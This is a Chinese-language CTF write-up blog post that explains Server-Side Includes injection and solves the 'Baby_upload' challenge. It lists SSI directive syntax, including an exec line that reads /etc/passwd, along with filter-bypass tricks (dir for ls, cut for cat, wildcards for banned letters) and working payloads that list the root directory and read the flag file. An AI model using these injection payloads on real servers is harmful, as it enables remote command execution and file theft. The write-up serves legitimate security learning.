长安战疫-web-Baby_upload复现

ctf-文件上传 ctf-SSI注入 长安战疫复现
ctf
Publish Date:   2022-01-15
Update Date:   2022-08-29
Word Count:   1k
Read Times:   4 Min
Read Count:  

长安战疫-web-Baby_upload复现

前置知识

SSI注入

简介

SSI 注入全称Server-Side Includes Injection,即服务端包含注入。SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。
SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。
从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码。

SSI注入的条件

当符合下列条件时,攻击者可以在 Web 服务器上运行任意命令:
1.Web 服务器已支持SSI(服务器端包含)
2.Web 应用程序未对相关SSI关键字做过滤
3.Web 应用程序在返回响应的HTML页面时,嵌入了用户输入

SSI挖掘思路

两个思路:
1.从业务场景来Fuzz,比如获取IP、定位、时间等
2.识别页面是否包含.stm,.shtm和.shtml后缀

常用语法

一.显示服务器端环境变量<#echo>
1.本文档名称:<!–#echo var="DOCUMENT_NAME"–>
2.现在时间:<!–#echo var="DATE_LOCAL"–>
3.显示IP地址:<! #echo var="REMOTE_ADDR"–>
二.将文本内容直接插入到文档中<#include>
<! #include file="文件名称"–>
<!--#include virtual="index.html" -->
<! #include virtual="文件名称"–>
<!--#include virtual="/www/footer.html" -->
注:file包含文件可以在同一级目录或其子目录中,但不能在上一级目录中,virtual包含文件可以是Web站点上的虚拟目录的完整路径
三.显示WEB文档相关信息<#flastmod><#fsize>(如文件制作日期/大小等)
1.文件最近更新日期:<! #flastmod file="文件名称"–>
2.文件的长度:<!–#fsize file="文件名称"–>
四.直接执行服务器上的各种程序<#exec>(如CGI或其他可执行程序)
<!–#exec cmd="文件名称"–>
<!--#exec cmd="cat /etc/passwd"-->
<!–#exec cgi="文件名称"–>
<!--#exec cgi="/cgi-bin/access_log.cgi"–>
将某一外部程序的输出插入到页面中。可插入CGI程序或者是常规应用程序的输入,这取决于使用的参数是cmd还是cgi。
五.设置SSI信息显示格式<#config>(如文件制作日期/大小显示方式)
六.高级SSI可设置变量使用if条件语句。

一些常见的绕过

ban了ls

用dir

ban了cat

用cut函数

cut函数

cut命令用于显示每行从开头算起 num1 到 num2 的文字。如:

cut [-c][file]

如果不指定 File 参数,cut 命令将读取标准输入。必须指定 -b、-c 或 -f 标志之一。

-b :以字节为单位进行分割。这些字节位置将忽略多字节字符边界,除非也指定了-n标志。
-c :以字符为单位进行分割。
-d :自定义分隔符,默认为制表符。
-f :与-d一起使用,指定显示哪个区域。
-n :取消分割多字节字符。仅和-b标志一起使用。如果字符的最后一个字节落在由-b标志的List 参数指示的范围之内,该字符将被写出;否则,该字符将被排除

题目详解

打开题目,发现是个文件上传,传png失败,看WP知道是SSI注入且png被不小心ban掉了。进行SSI注入。
ls命令被ban,使用dir代替,payload为(/为根目录,否则只能查到上传的那个文件下的内容)

<!--#exec cmd="dir /"-->

知道flag在fffffflllll11111aaaaa4444ggggg下,cat命令被ban,使用cut代替,payload为

<!--#exec cmd="cut -b 1-100 /fffffflllll11111aaaaa4444ggggg"-->

经过测试发现fl也被ban掉了,用通配符代替f或者l,最终payload为

<!--#exec cmd="cut -b 1-100 /fffff?lllll11111aaaaa4444ggggg"--><!--#exec cmd="cut -b 1-100 /ffffff?llll11111aaaaa4444ggggg"-->

得到flag:flag{cAzy_xxxxxxxxxx_12323421}
参考:
https://blog.csdn.net/qq_45521281/article/details/107576959
https://blog.csdn.net/qq_40657585/article/details/84260844
https://blog.csdn.net/m0_46230316/article/details/106289129

Author: kingkb
Link: http://kingofkb.github.io/2022/01/15/%E9%95%BF%E5%AE%89%E6%88%98%E7%96%AB-web-Baby_upload%E5%A4%8D%E7%8E%B0/
Reprint policy: All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source kingkb !
ctf-文件上传 ctf-SSI注入 长安战疫复现